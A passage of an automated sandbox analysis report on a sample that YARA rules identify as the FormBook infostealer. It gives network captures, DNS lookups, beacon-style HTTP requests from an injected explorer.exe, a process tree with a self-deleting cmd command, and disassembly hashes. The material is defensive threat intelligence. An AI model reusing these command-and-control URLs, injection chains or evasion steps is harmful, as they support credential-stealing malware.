                                                                    Oct 13, 2021 20:58:54.065212965 CEST | 49790 | 80 | 192.168.2.5 | 172.65.227.72
                                                                    Oct 13, 2021 20:58:54.065588951 CEST | 49790 | 80 | 192.168.2.5 | 172.65.227.72
                                                                    Oct 13, 2021 20:58:54.082298040 CEST | 80 | 49790 | 172.65.227.72 | 192.168.2.5
                                                                    Oct 13, 2021 20:58:54.380971909 CEST | 80 | 49790 | 172.65.227.72 | 192.168.2.5
                                                                    Oct 13, 2021 20:58:54.380996943 CEST | 80 | 49790 | 172.65.227.72 | 192.168.2.5
                                                                    Oct 13, 2021 20:58:54.381203890 CEST | 49790 | 80 | 192.168.2.5 | 172.65.227.72
                                                                    Oct 13, 2021 20:58:54.381292105 CEST | 49790 | 80 | 192.168.2.5 | 172.65.227.72
                                                                    Oct 13, 2021 20:58:54.397142887 CEST | 80 | 49790 | 172.65.227.72 | 192.168.2.5
                                                                    Oct 13, 2021 20:59:09.536864042 CEST | 49795 | 80 | 192.168.2.5 | 64.190.62.111
                                                                    Oct 13, 2021 20:59:09.554685116 CEST | 80 | 49795 | 64.190.62.111 | 192.168.2.5
                                                                    Oct 13, 2021 20:59:09.554913998 CEST | 49795 | 80 | 192.168.2.5 | 64.190.62.111
                                                                    Oct 13, 2021 20:59:09.555144072 CEST | 49795 | 80 | 192.168.2.5 | 64.190.62.111
                                                                    Oct 13, 2021 20:59:09.572714090 CEST | 80 | 49795 | 64.190.62.111 | 192.168.2.5
                                                                    Oct 13, 2021 20:59:09.598285913 CEST | 80 | 49795 | 64.190.62.111 | 192.168.2.5
                                                                    Oct 13, 2021 20:59:09.598323107 CEST | 80 | 49795 | 64.190.62.111 | 192.168.2.5
                                                                    Oct 13, 2021 20:59:09.598609924 CEST | 49795 | 80 | 192.168.2.5 | 64.190.62.111
                                                                    Oct 13, 2021 20:59:09.598695040 CEST | 49795 | 80 | 192.168.2.5 | 64.190.62.111
                                                                    Oct 13, 2021 20:59:09.616345882 CEST | 80 | 49795 | 64.190.62.111 | 192.168.2.5

                                                                    UDP Packets

                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Oct 13, 2021 20:58:54.008306980 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
                                                                    Oct 13, 2021 20:58:54.033735037 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
                                                                    Oct 13, 2021 20:58:59.395916939 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
                                                                    Oct 13, 2021 20:58:59.421633959 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
                                                                    Oct 13, 2021 20:59:04.443331003 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
                                                                    Oct 13, 2021 20:59:04.465982914 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
                                                                    Oct 13, 2021 20:59:09.501405954 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
                                                                    Oct 13, 2021 20:59:09.534939051 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
                                                                    Oct 13, 2021 20:59:14.611547947 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
                                                                    Oct 13, 2021 20:59:14.630974054 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
                                                                    Oct 13, 2021 20:59:19.956043005 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
                                                                    Oct 13, 2021 20:59:19.974540949 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5

                                                                    DNS Queries

                                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                    Oct 13, 2021 20:58:54.008306980 CEST | 192.168.2.5 | 8.8.8.8 | 0x3f12 | Standard query (0) | www.apricitee.com | A (IP address) | IN (0x0001)
                                                                    Oct 13, 2021 20:58:59.395916939 CEST | 192.168.2.5 | 8.8.8.8 | 0xc785 | Standard query (0) | www.instatechnovelz.com | A (IP address) | IN (0x0001)
                                                                    Oct 13, 2021 20:59:04.443331003 CEST | 192.168.2.5 | 8.8.8.8 | 0xcda9 | Standard query (0) | www.brondairy.com | A (IP address) | IN (0x0001)
                                                                    Oct 13, 2021 20:59:09.501405954 CEST | 192.168.2.5 | 8.8.8.8 | 0x377a | Standard query (0) | www.shacksolid.com | A (IP address) | IN (0x0001)
                                                                    Oct 13, 2021 20:59:14.611547947 CEST | 192.168.2.5 | 8.8.8.8 | 0x698b | Standard query (0) | www.rjtherealest.com | A (IP address) | IN (0x0001)
                                                                    Oct 13, 2021 20:59:19.956043005 CEST | 192.168.2.5 | 8.8.8.8 | 0x449d | Standard query (0) | www.fis.photos | A (IP address) | IN (0x0001)

                                                                    DNS Answers

                                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                    Oct 13, 2021 20:58:54.033735037 CEST | 8.8.8.8 | 192.168.2.5 | 0x3f12 | No error (0) | www.apricitee.com | vip.shoplazza.store | | CNAME (Canonical name) | IN (0x0001)
                                                                    Oct 13, 2021 20:58:54.033735037 CEST | 8.8.8.8 | 192.168.2.5 | 0x3f12 | No error (0) | vip.shoplazza.store | fbc7888164e64afca05b80bb89630439.pacloudflare.com | | CNAME (Canonical name) | IN (0x0001)
                                                                    Oct 13, 2021 20:58:54.033735037 CEST | 8.8.8.8 | 192.168.2.5 | 0x3f12 | No error (0) | fbc7888164e64afca05b80bb89630439.pacloudflare.com | | 172.65.227.72 | A (IP address) | IN (0x0001)
                                                                    Oct 13, 2021 20:58:59.421633959 CEST | 8.8.8.8 | 192.168.2.5 | 0xc785 | Name error (3) | www.instatechnovelz.com | none | none | A (IP address) | IN (0x0001)
                                                                    Oct 13, 2021 20:59:04.465982914 CEST | 8.8.8.8 | 192.168.2.5 | 0xcda9 | Name error (3) | www.brondairy.com | none | none | A (IP address) | IN (0x0001)
                                                                    Oct 13, 2021 20:59:09.534939051 CEST | 8.8.8.8 | 192.168.2.5 | 0x377a | No error (0) | www.shacksolid.com | | 64.190.62.111 | A (IP address) | IN (0x0001)
                                                                    Oct 13, 2021 20:59:14.630974054 CEST | 8.8.8.8 | 192.168.2.5 | 0x698b | No error (0) | www.rjtherealest.com | | 74.208.236.145 | A (IP address) | IN (0x0001)
                                                                    Oct 13, 2021 20:59:19.974540949 CEST | 8.8.8.8 | 192.168.2.5 | 0x449d | No error (0) | www.fis.photos | fis.photos | | CNAME (Canonical name) | IN (0x0001)
                                                                    Oct 13, 2021 20:59:19.974540949 CEST | 8.8.8.8 | 192.168.2.5 | 0x449d | No error (0) | fis.photos | | 192.0.78.24 | A (IP address) | IN (0x0001)
                                                                    Oct 13, 2021 20:59:19.974540949 CEST | 8.8.8.8 | 192.168.2.5 | 0x449d | No error (0) | fis.photos | | 192.0.78.25 | A (IP address) | IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • www.apricitee.com
                                                                    • www.shacksolid.com

                                                                    HTTP Packets

                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    0 | 192.168.2.5 | 49790 | 172.65.227.72 | 80 | C:\Windows\explorer.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Oct 13, 2021 20:58:54.065588951 CEST | 6908 | OUT | GET /ef6c/?BJB=7nO80D&yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaC HTTP/1.1
                                                                    Host: www.apricitee.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Oct 13, 2021 20:58:54.380971909 CEST | 6909 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Location: https://www.apricitee.com/ef6c/?BJB=7nO80D&yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaC
                                                                    Strict-Transport-Security: max-age=315360000; includeSubdomains
                                                                    X-Content-Type-Options: nosniff
                                                                    X-Download-Options: noopen
                                                                    X-Xss-Protection: 1; mode=block
                                                                    Date: Wed, 13 Oct 2021 18:58:54 GMT
                                                                    Content-Length: 159
                                                                    Connection: close
                                                                    Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 70 72 69 63 69 74 65 65 2e 63 6f 6d 2f 65 66 36 63 2f 3f 42 4a 42 3d 37 6e 4f 38 30 44 26 61 6d 70 3b 79 72 54 6c 67 6c 76 38 3d 4b 53 48 4e 2f 37 32 44 45 4a 50 79 64 2f 4f 75 47 4f 49 58 4e 46 42 53 5a 6f 4f 68 5a 53 53 71 63 5a 50 31 52 71 63 32 62 67 38 4b 45 50 73 58 4c 5a 64 50 73 51 4b 2b 48 6c 73 58 6e 33 4a 70 31 50 61 43 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                                                    Data Ascii: <a href="https://www.apricitee.com/ef6c/?BJB=7nO80D&amp;yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaC">Moved Permanently</a>.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    1 | 192.168.2.5 | 49795 | 64.190.62.111 | 80 | C:\Windows\explorer.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Oct 13, 2021 20:59:09.555144072 CEST | 6931 | OUT | GET /ef6c/?yrTlglv8=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/KtIrBMaY3r&BJB=7nO80D HTTP/1.1
                                                                    Host: www.shacksolid.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Oct 13, 2021 20:59:09.598285913 CEST | 6932 | IN | HTTP/1.1 302 Found
                                                                    date: Wed, 13 Oct 2021 18:59:09 GMT
                                                                    content-type: text/html; charset=UTF-8
                                                                    content-length: 0
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_D3MXYL1dze6qe7cOwJ2xLuV/g0A+RCNznrrC7wxtyCM8qdSMYKIxkg1u6Sue7w2UedwCteHB8MdfRzHrGBDLoQ==
                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    pragma: no-cache
                                                                    last-modified: Wed, 13 Oct 2021 18:59:09 GMT
                                                                    location: https://sedo.com/search/details/?partnerid=324561&language=e&domain=shacksolid.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                                    x-cache-miss-from: parking-f666569bc-whw7l
                                                                    server: NginX
                                                                    connection: close


                                                                    Code Manipulations

                                                                    Statistics

                                                                    CPU Usage

                                                                    Memory Usage

                                                                    High Level Behavior Distribution

                                                                    Behavior

                                                                    System Behavior

                                                                    General

                                                                    Start time:20:57:09
                                                                    Start date:13/10/2021
                                                                    Path:C:\Users\user\Desktop\Fu94e0b1TR.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\Fu94e0b1TR.exe'
                                                                    Imagebase:0x6d0000
                                                                    File size:474112 bytes
                                                                    MD5 hash:6429AA83E4BC083B4F0B3F44B0D7950F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    General

                                                                    Start time:20:57:22
                                                                    Start date:13/10/2021
                                                                    Path:C:\Users\user\Desktop\Fu94e0b1TR.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\Desktop\Fu94e0b1TR.exe
                                                                    Imagebase:0x350000
                                                                    File size:474112 bytes
                                                                    MD5 hash:6429AA83E4BC083B4F0B3F44B0D7950F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low

                                                                    General

                                                                    Start time:20:57:23
                                                                    Start date:13/10/2021
                                                                    Path:C:\Users\user\Desktop\Fu94e0b1TR.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\Fu94e0b1TR.exe
                                                                    Imagebase:0x610000
                                                                    File size:474112 bytes
                                                                    MD5 hash:6429AA83E4BC083B4F0B3F44B0D7950F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    General

                                                                    Start time:20:57:25
                                                                    Start date:13/10/2021
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                    Imagebase:0x7ff693d90000
                                                                    File size:3933184 bytes
                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:high

                                                                    General

                                                                    Start time:20:58:05
                                                                    Start date:13/10/2021
                                                                    Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                    Imagebase:0xb70000
                                                                    File size:32768 bytes
                                                                    MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:20:58:09
                                                                    Start date:13/10/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe'
                                                                    Imagebase:0x150000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:20:58:10
                                                                    Start date:13/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7ecfc0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Disassembly

                                                                    Code Analysis

                                                                      Executed Functions

                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00F5A516
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID: 6NE
                                                                      • API String ID: 4139908857-2481008274
                                                                      • Opcode ID: 092c835eb820b15c197c68d98dfbee161781e564ce3d9193d23b042e70a83135
                                                                      • Instruction ID: a99783443f216ad5ad0fdbab6ecbd3f6cb72700cd9c725ced98bcbcdfb8b8b4b
                                                                      • Opcode Fuzzy Hash: 092c835eb820b15c197c68d98dfbee161781e564ce3d9193d23b042e70a83135
                                                                      • Instruction Fuzzy Hash: B7716770A00B058FD724CF69C04179ABBF1FF88314F008A2DD586DBA50DB75E959CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F5C7BE,?,?,?,?,?), ref: 00F5C87F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID: 6NE
                                                                      • API String ID: 3793708945-2481008274
                                                                      • Opcode ID: 37d02e3b38ad6c0ce0053eadddcb4fa345b6f53c0b1cf3e46e0a9f2528a6f298
                                                                      • Instruction ID: fd60fab051c637ad70f24ac849bc98dff9510775dad89e8be87f6cc0ec09bcbc
                                                                      • Opcode Fuzzy Hash: 37d02e3b38ad6c0ce0053eadddcb4fa345b6f53c0b1cf3e46e0a9f2528a6f298
                                                                      • Instruction Fuzzy Hash: 332105B5D002089FDB10CFA9D585ADEBBF8FB48320F14841AE954A7210D374A955CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F5C7BE,?,?,?,?,?), ref: 00F5C87F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID: 6NE
                                                                      • API String ID: 3793708945-2481008274
                                                                      • Opcode ID: 909cafa645425920e5243f31281382ee99e55b46323f64df3b8a22b9ae5a92aa
                                                                      • Instruction ID: 6aec7531d6374ca4942f5db03496becd4fb2bf7788a48f44dfde89661df56d7b
                                                                      • Opcode Fuzzy Hash: 909cafa645425920e5243f31281382ee99e55b46323f64df3b8a22b9ae5a92aa
                                                                      • Instruction Fuzzy Hash: 4921E3B5D00309AFDB10CFA9D984ADEBBF8EB48324F14841AE915B7310D774A954DFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F5A591,00000800,00000000,00000000), ref: 00F5A7A2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID: 6NE
                                                                      • API String ID: 1029625771-2481008274
                                                                      • Opcode ID: 8956b1cefed4ca0f8f8cbeaf850dadc97cd4efbf5597dc17699e55b7fba6c7d3
                                                                      • Instruction ID: 1ca28b6454e24b52108c18aba788a0eb26f77c641efc1989f032c2f2a3182a1a
                                                                      • Opcode Fuzzy Hash: 8956b1cefed4ca0f8f8cbeaf850dadc97cd4efbf5597dc17699e55b7fba6c7d3
                                                                      • Instruction Fuzzy Hash: FA1126B6D002099FCB10CFAAD584ADEFBF4EF88324F14852ED955A7200C775A54ACFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F5A591,00000800,00000000,00000000), ref: 00F5A7A2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID: 6NE
                                                                      • API String ID: 1029625771-2481008274
                                                                      • Opcode ID: f00479f2fb034ac04acee7f37d088e60eb96364045128459e8d32e72f48b5cc1
                                                                      • Instruction ID: 7b1a0143033eced33cc428cff9d352261816970a899a087a805bd30280b43d09
                                                                      • Opcode Fuzzy Hash: f00479f2fb034ac04acee7f37d088e60eb96364045128459e8d32e72f48b5cc1
                                                                      • Instruction Fuzzy Hash: 291117B6D002099FDB10CF9AD544ADEFBF4EB48324F14852ED915A7200C375A959CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 071319E5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287859526.0000000007130000.00000040.00000001.sdmp, Offset: 07130000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID: 6NE
                                                                      • API String ID: 410705778-2481008274
                                                                      • Opcode ID: 34ae7da032ffd8cf01c103c8554c1bf7d9ca7df8bee2f14313dcdf0ffacfc72d
                                                                      • Instruction ID: e448fa8a218d0e07ab98435729812bc2da87fc15c3bb5184e35768e756ac7e3b
                                                                      • Opcode Fuzzy Hash: 34ae7da032ffd8cf01c103c8554c1bf7d9ca7df8bee2f14313dcdf0ffacfc72d
                                                                      • Instruction Fuzzy Hash: 091125B5800749AFCB20CF99C885BDFBFF8EB48324F108419E454A7600C374A594CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00F5A516
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID: 6NE
                                                                      • API String ID: 4139908857-2481008274
                                                                      • Opcode ID: 579eb8f2e7aa6acdbe932b85616de0479cecafc5c2477e275c1d7a1fa7e1d52a
                                                                      • Instruction ID: c661b1ee1ab1c6a584aff856ecd5cf35042431d9cf9d0b8c0d87ccb540ecf600
                                                                      • Opcode Fuzzy Hash: 579eb8f2e7aa6acdbe932b85616de0479cecafc5c2477e275c1d7a1fa7e1d52a
                                                                      • Instruction Fuzzy Hash: B91102B5C006498FCB20CFAAC444ADEFBF4AB48324F14851AD959B7200D374A549CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 071319E5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287859526.0000000007130000.00000040.00000001.sdmp, Offset: 07130000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID: 6NE
                                                                      • API String ID: 410705778-2481008274
                                                                      • Opcode ID: 26caf446138863f771647cc8eefa75ed7b811c1d9697653b2e9f270c7f3e4f0f
                                                                      • Instruction ID: 46012dd742c80b14a62dee8ede230806f2dad6f710f3741409d275f2ab265a0b
                                                                      • Opcode Fuzzy Hash: 26caf446138863f771647cc8eefa75ed7b811c1d9697653b2e9f270c7f3e4f0f
                                                                      • Instruction Fuzzy Hash: 581115B58007499FCB20CF9AC985BDEFBF8EB48324F108419E555A7200C374A584CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d87013ee91d9a2f00cb4a0113c5f6ea614f0ef91f80b0da10280631f526ea5c2
                                                                      • Instruction ID: 95519bda5ba4f38ff79fa8c54357fc38de351e94f5c09f5e4f8355753b6feedb
                                                                      • Opcode Fuzzy Hash: d87013ee91d9a2f00cb4a0113c5f6ea614f0ef91f80b0da10280631f526ea5c2
                                                                      • Instruction Fuzzy Hash: E412C5F1F997468BD310CF65E5881A93BA0BF44328FD24A08D2625FAD1D7B4156ACFC4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a98e006483e5d32421935f4778e047dd76b1e305012a92c5f679be2771df4c5c
                                                                      • Instruction ID: 5322410068e22bbaafdd2f87e05c74c6645210f95465e9587f922b95288c58a8
                                                                      • Opcode Fuzzy Hash: a98e006483e5d32421935f4778e047dd76b1e305012a92c5f679be2771df4c5c
                                                                      • Instruction Fuzzy Hash: 93A1A132E006198FCF19CFB5C8445DEBBB2FF89301B15856AE905BB221EB35A959DF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 41847c195b1fad2a2bbbf130035f6ed99413c1a758f743cbd928bf92944a7fcd
